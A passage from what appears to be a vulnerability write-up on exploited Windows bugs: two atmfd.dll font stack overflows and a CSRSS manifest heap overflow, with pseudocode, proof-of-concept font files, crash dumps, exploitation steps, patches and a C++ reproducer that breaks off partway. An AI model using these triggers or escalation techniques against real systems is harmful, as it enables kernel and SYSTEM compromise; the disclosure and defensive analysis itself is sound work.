  Fixed16_16 *ptrs[2];
  Fixed16_16 values[2];
  for (int i = 0; i < g_font->numMasters; i++) {
    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];
  }
  for (int i = 0; i < 2; i++) {
    int values_read = GetOpenFixedArray(values, g_font->numMasters);
    if (values_read != g_font->numMasters) {
      return -8;
    }
    for (int num = 0; num < g_font->numMasters; num++) {
      ptrs[num][i] = values[num];
    }
  }
  return 0;
}

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0 and 16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

...
RSP + 0x30    ptrs[0]
RSP + 0x38    ptrs[1]
RSP + 0x40    saved RDI
RSP + 0x48    return address
RSP + 0x50    values[0 .. 1]
RSP + 0x58    saved RBX
RSP + 0x60    saved RSI
...

The ptrs and values rows above are the user-controlled local arrays, while the saved RDI register and the return address are internal control flow data that could be corrupted. Interestingly, the two arrays were separated by that saved register and return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.
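
In other words (a toy model of ours based on the layout above, not atmfd’s actual code), the first corrupted write is equivalent to:

/* With numMasters == 5, ptrs[4] lands on top of values[0..1] at
 * RSP + 0x50, so two attacker-controlled 16.16 words read from the
 * font are reinterpreted as the destination pointer. */
uint32_t values[5];  /* filled by GetOpenFixedArray from the font */
uint64_t where = ((uint64_t)values[1] << 32) | values[0];
*(volatile uint32_t *)where = values[4];  /* write-what-where */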

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/WeightVector [0 0 0 0 0] def
/Private begin
/Blend begin
/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]
/end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile
cleartomark

The /WeightVector line sets numMasters to 5, and the /VToHOrigin line triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 0000000000000002, (reserved)
[...]
TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141
rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000
 r8=0000000000000000  r9=000000000000000e r10=0000000000000000
r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po cy
ATMFD+0x22144:
fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????
Resetting default scope
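
As a quick sanity check on the PoC constants, a small stand-alone helper of our own (not part of the exploit) shows how the decimal values map to the intended 16.16 fixed-point words:

#include <math.h>
#include <stdint.h>
#include <stdio.h>

/* Encode a decimal number in the 16.16 fixed-point format used by
 * Type 1 Multiple Master values. */
static uint32_t to_fixed16_16(double v) {
    return (uint32_t)(int32_t)llround(v * 65536.0);
}

int main(void) {
    printf("%08x\n", to_fixed16_16(16705.25490)); /* 41414141: low dword of target address */
    printf("%08x\n", to_fixed16_16(-0.00001));    /* ffffffff: high dword of target address */
    printf("%08x\n", to_fixed16_16(16962.25882)); /* 42424242: value written */
    return 0;
}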

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];
  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }
  SetNumMasters(num_master);
  for (int i = 0; i < num_master; i++) {
    procs->BlendDesignPositions(i, &values[i]);
  }
  return 0;
}

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]
/Private begin
/Blend begin
/end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile
cleartomark

In the /BlendDesignPositions line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xffffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.
Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 0000000000000002, (reserved)
[...]
TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000
rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000
rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002
 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000
r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
ffffffff`41414141 ??              ???
Resetting default scope
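
The distances involved are easy to verify with a little arithmetic of our own, based on the declaration of values above:

/* values[16][15] occupies 16 * 15 * sizeof(Fixed16_16) = 960 bytes,
 * while &values[22] lies 22 * 15 * 4 = 1320 bytes from the start of
 * the array: an overshoot of 360 bytes, far enough up the stack to
 * reach an unprotected return address on Windows 8.1. */
size_t overshoot = (22 * 15 * 4) - (16 * 15 * 4);  /* == 360 */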

Exploitation

According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000
PXE at FFFFF6FB7DBEDF90
contains 0000000115879863
pfn 115879    ---DA--KWEV
PPE at FFFFF6FB7DBF2000
contains 0000000115878863
pfn 115878    ---DA--KWEV
PDE at FFFFF6FB7E400000
contains 0000000115877863
pfn 115877    ---DA--KWEV
PTE at FFFFF6FC80000000
contains 8000000115976863
pfn 115976    ---DA--KW-V

As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.
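
The PTE address quoted above follows directly from the fixed (non-randomized) page-table self-map base used by Windows 8.1 x64; a small stand-alone calculation of ours reproduces it:

#include <stdint.h>
#include <stdio.h>

#define PTE_BASE 0xFFFFF68000000000ULL  /* fixed on Windows 8.1 x64 */

/* Address of the PTE mapping a given virtual address: index the
 * self-mapped page tables by the VA's low 48 bits. The NX bit lives
 * in the top dword of the 8-byte PTE, hence the +4 in the exploit. */
static uint64_t pte_for(uint64_t va) {
    return PTE_BASE + (((va & 0x0000FFFFFFFFFFFFULL) >> 12) << 3);
}

int main(void) {
    uint64_t shared_user_data = 0xFFFFF78000000000ULL;
    printf("%llx\n", (unsigned long long)pte_for(shared_user_data));      /* fffff6fbc0000000 */
    printf("%llx\n", (unsigned long long)pte_for(shared_user_data) + 4);  /* fffff6fbc0000004 */
    return 0;
}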

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[16];
  Fixed16_16 values[16];
  if (g_font->numMasters > 0x10) {
    return -4;
  }
  [...]
}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];
  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    if (num_master >= 16) {
      return -4;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }
  [...]
}

2. CSRSS issue on Windows 10 (CVE-2020-1027)

Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(
    PCSR_API_MSG ApiMessage,
    PVOID CaptureBuffer,
    ULONG ApiNumber,
    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.
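
For illustration, a client-side call has roughly the following shape. This is a sketch of ours using the unofficial, publicly reversed prototypes of the ntdll CSR functions; the message layout is a hypothetical placeholder (the real CSR_API_MSG carries port and CSR headers ahead of the call-specific parameters):

#include <windows.h>
#include <winternl.h>

/* Unofficial, publicly reversed ntdll prototypes -- illustrative only. */
extern PVOID    NTAPI CsrAllocateCaptureBuffer(ULONG ArgumentCount, ULONG BufferSize);
extern VOID     NTAPI CsrCaptureMessageBuffer(PVOID CaptureBuffer, PVOID Message,
                                              ULONG Length, PVOID *CapturedMessage);
extern VOID     NTAPI CsrFreeCaptureBuffer(PVOID CaptureBuffer);
extern NTSTATUS NTAPI CsrClientCallServer(PVOID ApiMessage, PVOID CaptureBuffer,
                                          ULONG ApiNumber, LONG DataLength);

/* Hypothetical message layout: API 0x10017's real message keeps several
 * UNICODE_STRING parameters after its headers, including the string at
 * offset 0x120 referred to below as ApplicationName. */
typedef struct _EXAMPLE_SXS_MSG {
    UCHAR Headers[0x120];           /* opaque; size illustrative       */
    UNICODE_STRING ApplicationName; /* validated by the server routine */
} EXAMPLE_SXS_MSG;

void ExampleCall(PCWSTR Name, USHORT NameBytes)
{
    EXAMPLE_SXS_MSG Msg = {0};
    PVOID Capture = CsrAllocateCaptureBuffer(1, NameBytes + sizeof(WCHAR));
    PVOID Remote = NULL;
    /* Copies the string into the shared region; Remote receives its
     * client-side address, which the API translates for the server. */
    CsrCaptureMessageBuffer(Capture, (PVOID)Name, NameBytes + sizeof(WCHAR), &Remote);
    Msg.ApplicationName.Length = NameBytes;
    Msg.ApplicationName.MaximumLength = (USHORT)(NameBytes + sizeof(WCHAR));
    Msg.ApplicationName.Buffer = (PWSTR)Remote;
    CsrClientCallServer(&Msg, Capture, 0x10017, sizeof(Msg));
    CsrFreeCaptureBuffer(Capture);
}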

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"
      version="1.0.0.0" processorArchitecture="x86"/>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"
          version="2.5.0.0" processorArchitecture="x86"/>
    </dependentAssembly>
  </dependency>
</assembly>

The bug

The vulnerability in question has been discovered in the routine sxssrv!BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {
  if (StringField = StringFields[i]) {
    Length = StringField->Length;
    if (Length && !StringField->Buffer ||
        Length > StringField->MaximumLength || Length & 1)
      return 0xC000000D;
    if (StringField->Buffer) {
      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,
                                    Length + 2, 1)) {
        DbgPrintEx(0x33, 0,
                   "SXS: Validation of message buffer 0x%lx failed.\n"
                   " Message:%p\n"
                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",
                   i, ApiMessage, StringField, StringField->Length,
                   StringField->MaximumLength, StringField->Buffer);
        return 0xC000000D;
      }
      CharCount = StringField->Length >> 1;
      if (StringField->Buffer[CharCount] &&
          StringField->Buffer[CharCount - 1])
        return 0xC000000D;
    }
  }
}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(
    PCSR_API_MSG ApiMessage,
    PVOID* Buffer,
    ULONG ElementCount,
    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.
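
Note the asymmetry this sets up. With hypothetical values of our own, a string like the following passes the validation while advertising a far larger, unaudited capacity:

/* CsrValidateMessageBuffer only checks that Length + 2 bytes lie
 * inside the capture buffer; MaximumLength is never audited. */
UNICODE_STRING ApplicationName;
ApplicationName.Length        = 2;                 /* 4 bytes validated   */
ApplicationName.MaximumLength = 0x8000;            /* unchecked capacity  */
ApplicationName.Buffer        = CaptureBufferSlot; /* inside shared region */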

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:

sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity
sxs!CNodeFactory::CreateNode
sxs!XMLParser::Run
sxs!SxspIncorporateAssembly
sxs!SxspCloseManifestGraph
sxs!SxsGenerateActivationContext
sxssrv!BaseSrvSxsCreateActivationContextFromStructEx
sxssrv!BaseSrvSxsCreateActivationContext

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;
if (BufferCapacity) {
  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;
  GenActCtxParams.ApplicationNameBuffer =
      CreateCtxParams->ApplicationName.Buffer;
} else {
  GenActCtxParams.ApplicationNameCapacity = 60;
  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);
  if (!StringBuffer) {
    Status = 0xC0000017;
    goto error;
  }
  GenActCtxParams.ApplicationNameBuffer = StringBuffer;
}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);
if (Context) {
  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);
} else {
  FusionpTraceAllocFailure(v14);
  SetLastError(0xE);
  goto error;
}
if (GenActCtxParams->ApplicationNameBuffer &&
    GenActCtxParams->ApplicationNameCapacity) {
  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;
  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;
}

Ultimately, sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;
IdentityNameLength = 0;
SetLastError(0);
if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,
                                           &IdentityNameBuffer,
                                           &IdentityNameLength)) {
  CallSiteInfo = off_16506FA20;
  goto error;
}
if (IdentityNameLength &&
    IdentityNameLength < Context->ApplicationNameCapacity) {
  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,
         2 * IdentityNameLength + 2);
  Context->ApplicationNameLength = IdentityNameLength;
} else {
  *Context->ApplicationNameBuffer = 0;
  Context->ApplicationNameLength = 0;
}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.

Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB". The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {
  LIST_ENTRY InLoadOrderModuleList;
  LIST_ENTRY InMemoryOrderModuleList;
  LIST_ENTRY InInitializationOrderModuleList;
  PVOID BaseAddress;
  PVOID EntryPoint;
  ULONG SizeOfImage;
  UNICODE_STRING FullDllName;
  UNICODE_STRING BaseDllName;
  ULONG Flags;
  SHORT LoadCount;
  SHORT TlsIndex;
  LIST_ENTRY HashTableEntry;
  ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;
if (ApplicationName.MaximumLength &&
    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,
                              ApplicationName.MaximumLength, 1)) {
  SavedMaximumLength = ApplicationName.MaximumLength;
  ApplicationName.MaximumLength = ApplicationName.Length + 2;
}
[...]
if (SavedMaximumLength)
  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =
      SavedMaximumLength;
return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>
#include <stdio.h>
#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =
    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"
    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"
    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "
    "processorArchitecture='amd64'/>"
    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";
const WCHAR* MANIFEST_NAME =
  L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"
  L"d761caeca23d64a2.manifest";
const WCHAR* PATH = L"\\\\.\\c:Windows\\";
const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,
                                                     ULONG BufferSize);
f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,
                                                   PVOID CaptureBuffer,
                                                   ULONG ApiNumber,
                                                   ULONG DataLength);
f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,
                                                       PCSTR String,
                                                       ULONG Length,
                                                       ULONG MaximumLength,
                                                       PSTR OutputString);
f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,
                              PCWSTR String, ULONG Length = 0) {
  if (Length == 0) {
    Length = lstrlenW(String);
  }
  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,
                                 Length * 2 + 2, OutputString);
}

int main() {
  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");
  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(
      Ntdll, "CsrAllocateCaptureBuffer");
  CsrClientCallServer =
      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");
  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(
      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];
  memset(Message, 0, 0x220);
  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;
  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.
  // The offsets and values are taken directly from the exploit.
  *(uint32_t*)(Message + 0x40) = 0xc1;
  *(uint16_t*)(Message + 0x44) = 9;
  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;
  // therefore, it doesn't have to be stored in the capture buffer.
  *(const char**)(Message + 0x80) = Manifest.c_str();
  *(uint64_t*)(Message + 0x88) = Manifest.size();
  *(uint64_t*)(Message + 0xf0) = 1;
